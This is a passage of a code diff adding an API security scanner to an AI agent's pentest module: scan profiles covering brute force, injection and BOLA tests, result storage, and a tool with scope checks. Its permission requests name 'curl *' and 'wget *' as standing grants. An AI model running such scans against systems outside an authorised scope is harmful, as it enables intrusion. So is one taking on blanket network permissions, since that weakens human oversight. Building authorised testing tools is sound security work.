+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: false,
+    },
+    authTests: {
+      enabled: true,
+      jwtAnalysis: true,
+      apiKeyTest: true,
+      oauthTest: true,
+      bruteForce: true,
+    },
+    injectionTests: {
+      enabled: false,
+      sql: false,
+      nosql: false,
+      command: false,
+    },
+    bolaTests: true,
+    timeout: 60000,
+  }
+
+  /**
+   * Custom profile template - user configurable.
+   */
+  export const Custom: ApiScanTypes.ScanProfile = {
+    id: "custom",
+    name: "Custom",
+    description: "User-configurable scan profile",
+    discovery: {
+      enabled: true,
+      parseOpenApi: true,
+      parseGraphQL: true,
+      commonPaths: true,
+    },
+    authTests: {
+      enabled: true,
+      jwtAnalysis: true,
+      apiKeyTest: true,
+      oauthTest: true,
+      bruteForce: false,
+    },
+    injectionTests: {
+      enabled: true,
+      sql: true,
+      nosql: true,
+      command: false,
+    },
+    bolaTests: true,
+    timeout: 60000,
+  }
+
+  /**
+   * All available profiles.
+   */
+  export const All: Record<ApiScanTypes.ProfileId, ApiScanTypes.ScanProfile> = {
+    discovery: Discovery,
+    quick: Quick,
+    standard: Standard,
+    thorough: Thorough,
+    passive: Passive,
+    "auth-focused": AuthFocused,
+    custom: Custom,
+  }
+
+  /**
+   * Get a profile by ID.
+   *
+   * @param id - Profile ID
+   * @returns Profile or undefined if not found
+   */
+  export function get(id: ApiScanTypes.ProfileId): ApiScanTypes.ScanProfile | undefined {
+    return All[id]
+  }
+
+  /**
+   * List all profiles.
+   *
+   * @returns Array of all profiles
+   */
+  export function list(): ApiScanTypes.ScanProfile[] {
+    return Object.values(All)
+  }
+
+  /**
+   * Create a custom profile with overrides.
+   *
+   * @param base - Base profile ID
+   * @param overrides - Partial profile overrides
+   * @returns Merged profile
+   */
+  export function createCustom(
+    base: ApiScanTypes.ProfileId,
+    overrides: Partial<Omit<ApiScanTypes.ScanProfile, "id">>
+  ): ApiScanTypes.ScanProfile {
+    const baseProfile = get(base) || Custom
+    return {
+      ...baseProfile,
+      ...overrides,
+      id: "custom",
+      discovery: {
+        ...baseProfile.discovery,
+        ...overrides.discovery,
+      },
+      authTests: {
+        ...baseProfile.authTests,
+        ...overrides.authTests,
+      },
+      injectionTests: {
+        ...baseProfile.injectionTests,
+        ...overrides.injectionTests,
+      },
+    }
+  }
+
+  /**
+   * Format profile for display.
+   *
+   * @param profile - Profile to format
+   * @returns Formatted string
+   */
+  export function format(profile: ApiScanTypes.ScanProfile): string {
+    const lines: string[] = []
+    lines.push(`Profile: ${profile.name} (${profile.id})`)
+    lines.push(`Description: ${profile.description}`)
+    lines.push("")
+    lines.push("Discovery:")
+    lines.push(`  OpenAPI: ${profile.discovery.parseOpenApi ? "Yes" : "No"}`)
+    lines.push(`  GraphQL: ${profile.discovery.parseGraphQL ? "Yes" : "No"}`)
+    lines.push(`  Common Paths: ${profile.discovery.commonPaths ? "Yes" : "No"}`)
+    lines.push("")
+    lines.push("Auth Tests:")
+    lines.push(`  Enabled: ${profile.authTests.enabled ? "Yes" : "No"}`)
+    if (profile.authTests.enabled) {
+      lines.push(`  JWT Analysis: ${profile.authTests.jwtAnalysis ? "Yes" : "No"}`)
+      lines.push(`  API Key Test: ${profile.authTests.apiKeyTest ? "Yes" : "No"}`)
+      lines.push(`  OAuth Test: ${profile.authTests.oauthTest ? "Yes" : "No"}`)
+      lines.push(`  Brute Force: ${profile.authTests.bruteForce ? "Yes" : "No"}`)
+    }
+    lines.push("")
+    lines.push("Injection Tests:")
+    lines.push(`  Enabled: ${profile.injectionTests.enabled ? "Yes" : "No"}`)
+    if (profile.injectionTests.enabled) {
+      lines.push(`  SQL: ${profile.injectionTests.sql ? "Yes" : "No"}`)
+      lines.push(`  NoSQL: ${profile.injectionTests.nosql ? "Yes" : "No"}`)
+      lines.push(`  Command: ${profile.injectionTests.command ? "Yes" : "No"}`)
+    }
+    lines.push("")
+    lines.push(`BOLA Tests: ${profile.bolaTests ? "Yes" : "No"}`)
+    if (profile.rateLimit) {
+      lines.push(`Rate Limit: ${profile.rateLimit} req/s`)
+    }
+    lines.push(`Timeout: ${profile.timeout}ms`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format all profiles as a summary table.
+   *
+   * @returns Formatted table string
+   */
+  export function formatTable(): string {
+    const lines: string[] = []
+    lines.push("| Profile | Discovery | Auth | Injection | BOLA | Use Case |")
+    lines.push("|---------|-----------|------|-----------|------|----------|")
+
+    for (const profile of list()) {
+      const discovery = profile.discovery.enabled ? "Yes" : "No"
+      const auth = profile.authTests.enabled ? "Yes" : "No"
+      const injection = profile.injectionTests.enabled ? "Yes" : "No"
+      const bola = profile.bolaTests ? "Yes" : "No"
+      lines.push(`| ${profile.id} | ${discovery} | ${auth} | ${injection} | ${bola} | ${profile.description} |`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/storage.ts b/packages/opencode/src/pentest/apiscan/storage.ts
new file mode 100644
index 00000000000..9b9e7ee4e45
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/storage.ts
@@ -0,0 +1,348 @@
+/**
+ * @fileoverview API Scan Storage
+ *
+ * Storage helpers for API specifications and scan results.
+ *
+ * @module pentest/apiscan/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { ApiScanTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "apiscan.storage" })
+
+/**
+ * Generate a unique spec ID.
+ */
+function generateSpecId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `spec_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique scan ID.
+ */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `apiscan_${timestamp}_${random}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/**
+ * API scan storage namespace.
+ */
+export namespace ApiScanStorage {
+  /** In-memory buffers for testing */
+  const specBuffer: ApiScanTypes.ApiSpec[] = []
+  const scanBuffer: ApiScanTypes.ApiScanResult[] = []
+
+  /**
+   * Save an API specification.
+   *
+   * @param spec - API specification (id will be generated if not provided)
+   * @param config - Storage configuration
+   * @returns Saved spec with ID
+   */
+  export async function saveSpec(
+    spec: Omit<ApiScanTypes.ApiSpec, "id"> | ApiScanTypes.ApiSpec,
+    config: StorageConfig = {}
+  ): Promise<ApiScanTypes.ApiSpec> {
+    const full: ApiScanTypes.ApiSpec = {
+      ...spec,
+      id: "id" in spec && spec.id ? spec.id : generateSpecId(),
+    }
+    const validated = ApiScanTypes.ApiSpec.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = specBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        specBuffer[existingIdx] = validated
+      } else {
+        specBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "apiscan", "specs", validated.id], validated)
+    }
+
+    log.info("API spec saved", {
+      id: validated.id,
+      target: validated.target,
+      type: validated.type,
+      endpointCount: validated.endpoints.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get an API specification by ID.
+   *
+   * @param id - Spec ID
+   * @param config - Storage configuration
+   * @returns API spec or null if not found
+   */
+  export async function getSpec(id: string, config: StorageConfig = {}): Promise<ApiScanTypes.ApiSpec | null> {
+    if (config.storage === "memory") {
+      return specBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<ApiScanTypes.ApiSpec>(["pentest", "apiscan", "specs", id])
+      return ApiScanTypes.ApiSpec.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List API specifications with filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of API specs
+   */
+  export async function listSpecs(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      type?: ApiScanTypes.SpecType
+      limit?: number
+    }
+  ): Promise<ApiScanTypes.ApiSpec[]> {
+    let specs: ApiScanTypes.ApiSpec[]
+
+    if (config.storage === "memory") {
+      specs = [...specBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "apiscan", "specs"])
+      specs = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ApiScanTypes.ApiSpec>(key)
+          specs.push(ApiScanTypes.ApiSpec.parse(data))
+        } catch {
+          log.warn("Failed to parse spec file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      specs = specs.filter((s) => s.target === filters.target)
+    }
+    if (filters?.type) {
+      specs = specs.filter((s) => s.type === filters.type)
+    }
+
+    // Sort by discovery time (newest first)
+    specs.sort((a, b) => b.discoveredAt - a.discoveredAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      specs = specs.slice(0, filters.limit)
+    }
+
+    return specs
+  }
+
+  /**
+   * Delete an API specification.
+   *
+   * @param id - Spec ID
+   * @param config - Storage configuration
+   * @returns true if deleted, false if not found
+   */
+  export async function deleteSpec(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = specBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        specBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "apiscan", "specs", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Save a scan result.
+   *
+   * @param result - Scan result (id will be generated if not provided)
+   * @param config - Storage configuration
+   * @returns Saved result with ID
+   */
+  export async function saveScan(
+    result: Omit<ApiScanTypes.ApiScanResult, "id"> | ApiScanTypes.ApiScanResult,
+    config: StorageConfig = {}
+  ): Promise<ApiScanTypes.ApiScanResult> {
+    const full: ApiScanTypes.ApiScanResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateScanId(),
+    }
+    const validated = ApiScanTypes.ApiScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "apiscan", "scans", validated.id], validated)
+    }
+
+    log.info("API scan result saved", {
+      id: validated.id,
+      target: validated.target,
+      profile: validated.profile,
+      findingsCount: validated.findings.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a scan result by ID.
+   *
+   * @param id - Scan ID
+   * @param config - Storage configuration
+   * @returns Scan result or null if not found
+   */
+  export async function getScan(id: string, config: StorageConfig = {}): Promise<ApiScanTypes.ApiScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<ApiScanTypes.ApiScanResult>(["pentest", "apiscan", "scans", id])
+      return ApiScanTypes.ApiScanResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List scan results with filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of scan results
+   */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      profile?: ApiScanTypes.ProfileId
+      status?: ApiScanTypes.Status
+      limit?: number
+    }
+  ): Promise<ApiScanTypes.ApiScanResult[]> {
+    let scans: ApiScanTypes.ApiScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "apiscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ApiScanTypes.ApiScanResult>(key)
+          scans.push(ApiScanTypes.ApiScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      scans = scans.filter((s) => s.target === filters.target)
+    }
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    scans.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Delete a scan result.
+   *
+   * @param id - Scan ID
+   * @param config - Storage configuration
+   * @returns true if deleted, false if not found
+   */
+  export async function deleteScan(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "apiscan", "scans", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    specBuffer.length = 0
+    scanBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): { specs: number; scans: number } {
+    return {
+      specs: specBuffer.length,
+      scans: scanBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/tool.ts b/packages/opencode/src/pentest/apiscan/tool.ts
new file mode 100644
index 00000000000..c2dbef2047a
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/tool.ts
@@ -0,0 +1,784 @@
+/**
+ * @fileoverview API Security Scanner Tool
+ *
+ * Agent tool for API discovery, authentication testing,
+ * authorization testing, and injection testing.
+ *
+ * @module pentest/apiscan/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { GovernanceScope } from "../../governance/scope"
+import { GovernanceMatcher } from "../../governance/matcher"
+import { ApiScanTypes } from "./types"
+import { ApiDiscovery } from "./discovery"
+import { ApiScanOrchestrator } from "./orchestrator"
+import { ApiScanProfiles } from "./profiles"
+import { ApiScanStorage } from "./storage"
+import { JwtAnalyzer } from "./auth/jwt"
+import { Session } from "../../session"
+
+/**
+ * API Security Scanner Tool for penetration testing.
+ *
+ * Provides API discovery, authentication analysis, and vulnerability detection.
+ */
+export const ApiScanTool = Tool.define("apiscan", async () => {
+  return {
+    description: `API security scanning with discovery, authentication testing, and OWASP API Top 10 analysis.
+
+ACTIONS:
+- discover: Discover API endpoints from target (auto-detect OpenAPI/GraphQL)
+- parse-spec: Parse OpenAPI/Swagger specification from URL
+- parse-graphql: Parse GraphQL introspection from URL
+- scan: Run security scan with a specific profile
+- quick-scan: Quick scan (alias for quick profile)
+- full-scan: Thorough scan (alias for thorough profile)
+- endpoints: List discovered API endpoints
+- jwt-analyze: Analyze a JWT token for vulnerabilities
+- auth-test: Test authentication mechanisms
+- bola-test: Test for BOLA/IDOR vulnerabilities
+- inject-test: Test for injection vulnerabilities
+- status: Get status of a scan
+- owasp-api: Categorize findings by OWASP API Top 10 2023
+- profiles: List available scan profiles
+
+PROFILES:
+- discovery: Map API surface only
+- quick: Fast assessment with JWT analysis
+- standard: Balanced scan with auth and injection tests
+- thorough: Comprehensive with all tests
+- passive: Spec analysis only
+- auth-focused: Authentication testing focus
+
+EXAMPLES:
+- Discover API: action="discover", target="http://api.example.com"
+- Parse spec: action="parse-spec", specUrl="http://api.example.com/openapi.json"
+- JWT analysis: action="jwt-analyze", token="eyJ..."
+- Quick scan: action="quick-scan", target="http://api.example.com"
+- Full scan: action="full-scan", target="http://api.example.com", token="Bearer eyJ..."`,
+
+    parameters: z.object({
+      action: z
+        .enum([
+          "discover",
+          "parse-spec",
+          "parse-graphql",
+          "scan",
+          "quick-scan",
+          "full-scan",
+          "endpoints",
+          "jwt-analyze",
+          "auth-test",
+          "bola-test",
+          "inject-test",
+          "status",
+          "owasp-api",
+          "profiles",
+        ])
+        .describe("Action to perform"),
+
+      // Target
+      target: z.string().optional().describe("Target API URL (http:// or https://)"),
+
+      // Spec options
+      specUrl: z.string().optional().describe("URL to OpenAPI/Swagger spec"),
+      specId: z.string().optional().describe("Spec ID for endpoints action"),
+
+      // Auth options
+      token: z.string().optional().describe("JWT or Bearer token for authentication"),
+      apiKey: z.string().optional().describe("API key value"),
+      apiKeyHeader: z.string().optional().describe("API key header name (default: X-API-Key)"),
+
+      // Scan options
+      profile: z
+        .enum(["discovery", "quick", "standard", "thorough", "passive", "auth-focused", "custom"])
+        .optional()
+        .describe("Scan profile"),
+
+      // Query options
+      scanID: z.string().optional().describe("Scan ID for status/owasp-api actions"),
+      limit: z.number().optional().describe("Maximum results to return. Default: 50"),
+
+      // BOLA/injection test options
+      endpointPath: z.string().optional().describe("Endpoint path for testing (e.g., /api/users/{id})"),
+      testIds: z.array(z.string()).optional().describe("IDs to test for BOLA"),
+      parameter: z.string().optional().describe("Parameter name for injection testing"),
+
+      // Timeout
+      timeout: z.number().optional().describe("Timeout per request in milliseconds"),
+    }),
+
+    async execute(params, ctx) {
+      switch (params.action) {
+        case "discover":
+          return handleDiscover(params, ctx)
+
+        case "parse-spec":
+          return handleParseSpec(params, ctx)
+
+        case "parse-graphql":
+          return handleParseGraphQL(params, ctx)
+
+        case "scan":
+          return handleScan(params, ctx, params.profile || "standard")
+
+        case "quick-scan":
+          return handleScan(params, ctx, "quick")
+
+        case "full-scan":
+          return handleScan(params, ctx, "thorough")
+
+        case "endpoints":
+          return handleEndpoints(params)
+
+        case "jwt-analyze":
+          return handleJwtAnalyze(params)
+
+        case "status":
+          return handleStatus(params)
+
+        case "owasp-api":
+          return handleOwaspApi(params)
+
+        case "profiles":
+          return handleProfiles()
+
+        default:
+          return {
+            title: `Unknown action: ${params.action}`,
+            output: `Supported actions: discover, parse-spec, parse-graphql, scan, quick-scan, full-scan, endpoints, jwt-analyze, status, owasp-api, profiles`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
+
+/**
+ * Handle discover action.
+ */
+async function handleDiscover(
+  params: {
+    target?: string
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.target) {
+    return {
+      title: "Discover requires target",
+      output: "Please provide a target API URL (e.g., http://api.example.com).",
+      metadata: { action: "discover", status: "error" },
+    }
+  }
+
+  // Validate target URL
+  try {
+    const targetUrl = new URL(params.target)
+    if (!["http:", "https:"].includes(targetUrl.protocol)) {
+      throw new Error("Invalid protocol")
+    }
+  } catch {
+    return {
+      title: "Invalid target URL",
+      output: "Please provide a valid HTTP/HTTPS URL.",
+      metadata: { action: "discover", status: "error" },
+    }
+  }
+
+  // Validate against governance scope
+  const targets = GovernanceMatcher.extractTargets("apiscan", { target: params.target })
+  const scopeCheck = GovernanceScope.check(targets, undefined)
+  if (!scopeCheck.allowed) {
+    return {
+      title: "Target out of scope",
+      output: `Governance scope violation: ${scopeCheck.reason}`,
+      metadata: { action: "discover", target: params.target, status: "scope_violation" },
+    }
+  }
+
+  // Request permission for network access
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`curl *`, `wget *`],
+    always: [`curl *`, `wget *`],
+    metadata: { action: "discover", target: params.target },
+  })
+
+  ctx.metadata({
+    title: `Discovering API at ${params.target}`,
+    metadata: { action: "discover", target: params.target, status: "running" },
+  })
+
+  try {
+    const result = await ApiDiscovery.discover(params.target, {
+      timeout: params.timeout,
+    })
+
+    if (!result.success || !result.spec) {
+      return {
+        title: "No API specification found",
+        output: `Probed ${result.probedPaths?.length || 0} paths but no OpenAPI or GraphQL spec was found.\n\nPaths tried:\n${result.probedPaths?.slice(0, 10).join("\n") || "None"}`,
+        metadata: {
+          action: "discover",
+          target: params.target,
+          probedPaths: result.probedPaths?.length || 0,
+          status: "not_found",
+        },
+      }
+    }
+
+    const spec = result.spec
+    const lines: string[] = []
+    lines.push(`API discovered: ${spec.title || params.target}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Spec ID: ${spec.id}`)
+    lines.push(`Type: ${spec.type}`)
+    if (spec.version) lines.push(`Version: ${spec.version}`)
+    lines.push(`Endpoints: ${spec.endpoints.length}`)
+    lines.push(`Security Schemes: ${spec.securitySchemes.length}`)
+
+    if (spec.endpoints.length > 0) {
+      lines.push("")
+      lines.push("Sample Endpoints:")
+      for (const ep of spec.endpoints.slice(0, 10)) {
+        lines.push(`  ${ep.method} ${ep.path}${ep.summary ? ` - ${ep.summary}` : ""}`)
+      }
+      if (spec.endpoints.length > 10) {
+        lines.push(`  ... and ${spec.endpoints.length - 10} more`)
+      }
+    }
+
+    if (spec.securitySchemes.length > 0) {
+      lines.push("")
+      lines.push("Security Schemes:")
+      for (const scheme of spec.securitySchemes) {
+        lines.push(`  ${scheme.name}: ${scheme.type}${scheme.scheme ? ` (${scheme.scheme})` : ""}`)
+      }
+    }
+
+    return {
+      title: `Discovered ${spec.endpoints.length} endpoints`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "discover",
+        specId: spec.id,
+        target: params.target,
+        type: spec.type,
+        endpointCount: spec.endpoints.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Discovery failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "discover", target: params.target, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle parse-spec action.
+ */
+async function handleParseSpec(
+  params: {
+    specUrl?: string
+    target?: string
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.specUrl) {
+    return {
+      title: "Parse-spec requires specUrl",
+      output: "Please provide a URL to an OpenAPI/Swagger specification.",
+      metadata: { action: "parse-spec", status: "error" },
+    }
+  }
+
+  const baseUrl = params.target || new URL(params.specUrl).origin
+
+  // Request permission for network access
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`curl *`, `wget *`],
+    always: [`curl *`, `wget *`],
+    metadata: { action: "parse-spec", specUrl: params.specUrl },
+  })
+
+  try {
+    const spec = await ApiDiscovery.fetchSpec(params.specUrl, "openapi", baseUrl, {
+      timeout: params.timeout,
+    })
+
+    return {
+      title: `Parsed ${spec.endpoints.length} endpoints from OpenAPI spec`,
+      output: `Spec ID: ${spec.id}\nTitle: ${spec.title || "Untitled"}\nVersion: ${spec.version || "unknown"}\nEndpoints: ${spec.endpoints.length}\nSecurity Schemes: ${spec.securitySchemes.length}`,
+      metadata: {
+        action: "parse-spec",
+        specId: spec.id,
+        specUrl: params.specUrl,
+        endpointCount: spec.endpoints.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Failed to parse OpenAPI spec",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "parse-spec", specUrl: params.specUrl, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle parse-graphql action.
+ */
+async function handleParseGraphQL(
+  params: {
+    target?: string
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.target) {
+    return {
+      title: "Parse-graphql requires target",
+      output: "Please provide the GraphQL endpoint URL.",
+      metadata: { action: "parse-graphql", status: "error" },
+    }
+  }
+
+  // Request permission for network access
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`curl *`, `wget *`],
+    always: [`curl *`, `wget *`],
+    metadata: { action: "parse-graphql", target: params.target },
+  })
+
+  try {
+    const spec = await ApiDiscovery.fetchSpec(params.target, "graphql", params.target, {
+      timeout: params.timeout,
+    })
+
+    const lines: string[] = []
+    lines.push(`GraphQL introspection successful`)
+    lines.push("=".repeat(50))
+    lines.push(`Spec ID: ${spec.id}`)
+    lines.push(`Endpoints (operations): ${spec.endpoints.length}`)
+
+    if (spec.graphqlSchema) {
+      lines.push(`Types: ${spec.graphqlSchema.types.length}`)
+      lines.push(`Query Type: ${spec.graphqlSchema.queryType || "None"}`)
+      lines.push(`Mutation Type: ${spec.graphqlSchema.mutationType || "None"}`)
+    }
+
+    return {
+      title: `Parsed ${spec.endpoints.length} operations from GraphQL`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "parse-graphql",
+        specId: spec.id,
+        target: params.target,
+        operationCount: spec.endpoints.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Failed to parse GraphQL introspection",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "parse-graphql", target: params.target, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle scan action.
+ */
+async function handleScan(
+  params: {
+    target?: string
+    specUrl?: string
+    token?: string
+    apiKey?: string
+    apiKeyHeader?: string
+    profile?: string
+    timeout?: number
+  },
+  ctx: Tool.Context,
+  profileId: ApiScanTypes.ProfileId
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.target) {
+    return {
+      title: "Scan requires target",
+      output: "Please provide a target API URL (e.g., http://api.example.com).",
+      metadata: { action: "scan", status: "error" },
+    }
+  }
+
+  // Validate target URL
+  try {
+    const targetUrl = new URL(params.target)
+    if (!["http:", "https:"].includes(targetUrl.protocol)) {
+      throw new Error("Invalid protocol")
+    }
+  } catch {
+    return {
+      title: "Invalid target URL",
+      output: "Please provide a valid HTTP/HTTPS URL.",
+      metadata: { action: "scan", status: "error" },
+    }
+  }
+
+  // Validate against governance scope
+  const targets = GovernanceMatcher.extractTargets("apiscan", { target: params.target })
+  const scopeCheck = GovernanceScope.check(targets, undefined)
+  if (!scopeCheck.allowed) {
+    return {
+      title: "Target out of scope",
+      output: `Governance scope violation: ${scopeCheck.reason}`,
+      metadata: { action: "scan", target: params.target, status: "scope_violation" },
+    }
+  }
+
+  // Build auth config
+  let auth: ApiScanTypes.AuthConfig | undefined
+  if (params.token) {
+    auth = { type: params.token.startsWith("Bearer ") ? "bearer" : "jwt", token: params.token.replace(/^Bearer\s+/i, "") }
+  } else if (params.apiKey) {
+    auth = { type: "apikey", apiKey: { header: params.apiKeyHeader || "X-API-Key", value: params.apiKey } }
+  }
+
+  const profile = ApiScanProfiles.get(profileId)
+
+  // Request permission for security scanning
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`curl *`, `wget *`],
+    always: [`curl *`, `wget *`],
+    metadata: {
+      action: "scan",
+      target: params.target,
+      profile: profileId,
+    },
+  })
+
+  ctx.metadata({
+    title: `Scanning API at ${params.target} with ${profileId} profile`,
+    metadata: { action: "scan", target: params.target, profile: profileId, status: "running" },
+  })
+
+  try {
+    // Get current session ID
+    const sessionId = ctx.sessionID
+
+    const result = await ApiScanOrchestrator.scan(params.target, {
+      profile: profileId,
+      specUrl: params.specUrl,
+      auth,
+      sessionId,
+    })
+
+    // Format output
+    const lines: string[] = []
+    lines.push(`API Scan Complete: ${params.target}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Scan ID: ${result.id}`)
+    lines.push(`Profile: ${profileId}`)
+    lines.push(`Status: ${result.status}`)
+    lines.push(`Duration: ${(result.stats.duration / 1000).toFixed(1)}s`)
+    lines.push("")
+    lines.push("Statistics:")
+    lines.push(`  Endpoints discovered: ${result.stats.endpointsDiscovered}`)
+    lines.push(`  Endpoints scanned: ${result.stats.endpointsScanned}`)
+    lines.push(`  Endpoints vulnerable: ${result.stats.endpointsVulnerable}`)
+    lines.push(`  Auth tests run: ${result.stats.authTestsRun}`)
+    lines.push(`  Injection tests run: ${result.stats.injectionTestsRun}`)
+    lines.push(`  BOLA tests run: ${result.stats.bolaTestsRun}`)
+    lines.push("")
+    lines.push("Findings:")
+    lines.push(`  Critical: ${result.stats.criticalCount}`)
+    lines.push(`  High: ${result.stats.highCount}`)
+    lines.push(`  Medium: ${result.stats.mediumCount}`)
+    lines.push(`  Low: ${result.stats.lowCount}`)
+    lines.push(`  Info: ${result.stats.infoCount}`)
+    lines.push(`  Total: ${result.stats.findingsCount}`)
+
+    if (result.jwtAnalysis && result.jwtAnalysis.issues.length > 0) {
+      lines.push("")
+      lines.push("JWT Issues:")
+      for (const issue of result.jwtAnalysis.issues.slice(0, 5)) {
+        lines.push(`  - ${issue}`)
+      }
+    }
+
+    return {
+      title: `Scan complete: ${result.stats.findingsCount} finding(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "scan",
+        scanID: result.id,
+        target: params.target,
+        profile: profileId,
+        findingsCount: result.stats.findingsCount,
+        criticalCount: result.stats.criticalCount,
+        highCount: result.stats.highCount,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "scan", target: params.target, profile: profileId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle endpoints action.
+ */
+async function handleEndpoints(params: {
+  specId?: string
+  limit?: number
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.specId) {
+    return {
+      title: "Endpoints requires specId",
+      output: "Please provide a spec ID.",
+      metadata: { action: "endpoints", status: "error" },
+    }
+  }
+
+  const spec = await ApiScanStorage.getSpec(params.specId)
+  if (!spec) {
+    return {
+      title: "Spec not found",
+      output: `No spec with ID: ${params.specId}`,
+      metadata: { action: "endpoints", specId: params.specId, status: "error" },
+    }
+  }
+
+  const limit = params.limit || 50
+  const endpoints = spec.endpoints.slice(0, limit)
+
+  const lines: string[] = []
+  lines.push(`Endpoints from spec: ${params.specId}`)
+  lines.push(`Target: ${spec.target}`)
+  lines.push(`Total: ${spec.endpoints.length}`)
+  lines.push("=".repeat(50))
+
+  for (const ep of endpoints) {
+    const security = ep.security?.length ? " [auth]" : ""
+    lines.push(`${ep.method.padEnd(7)} ${ep.path}${security}`)
+    if (ep.summary) {
+      lines.push(`        ${ep.summary}`)
+    }
+  }
+
